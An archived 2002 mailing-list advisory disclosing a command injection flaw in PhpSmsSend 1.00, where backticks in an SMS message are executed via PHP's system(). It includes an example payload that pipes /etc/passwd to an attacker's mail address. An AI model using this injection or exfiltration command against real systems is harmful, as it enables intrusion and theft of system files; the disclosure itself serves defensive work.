Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

PhpSmsSend remote execute commands bug

From: Indra Kusuma <indra () kusuma or id>
Date: Wed, 30 Jan 2002 01:46:50 +0000 (GMT)

---[ PhpSmsSend remote execute commands bug
  
---[ About PhpSmsSend
        
   PhpSmsSend is a frontend to the SmsSend application. It consists of a
.php file, from which you select one of the available scripts, and then
you can send an SMS wherever you want, all around the world.

PhpSmssend's website is http://zekiller.skytech.org/smssend.php

---[ Affected System

  PhpSmsSystem Version 1.00

---[ Description

from file .php :

      $str = SMSSEND." ".SCRIPTSPATH.$script." $params -- -d 0 ".PROXY;
      system($str,$res);

if the sms messages contain a backtick "`" then inside of backtick will be 
execute as a system command.

the result of the command will send via sms :), so the command output
should be less than 160 characters to send via sms, but if the command
using pipe (ex : cat /etc/passwd|mail evil () hacker com) or redirection then 
the messages status is successfully :)

---[ Greetz

my Guru GaniSalman, my friend OpsCrew, #indoSniffing and 
#medanHacking (DalNet), Fate Research Labs (www.fatelabs.com), LUG STIKOM 
(lug.stikom.edu), balung.brawijaya.ac.id and the gauli.com owner


---

cheers,


IndraKusuma
Previous By Date Next
Previous By Thread Next

Current thread: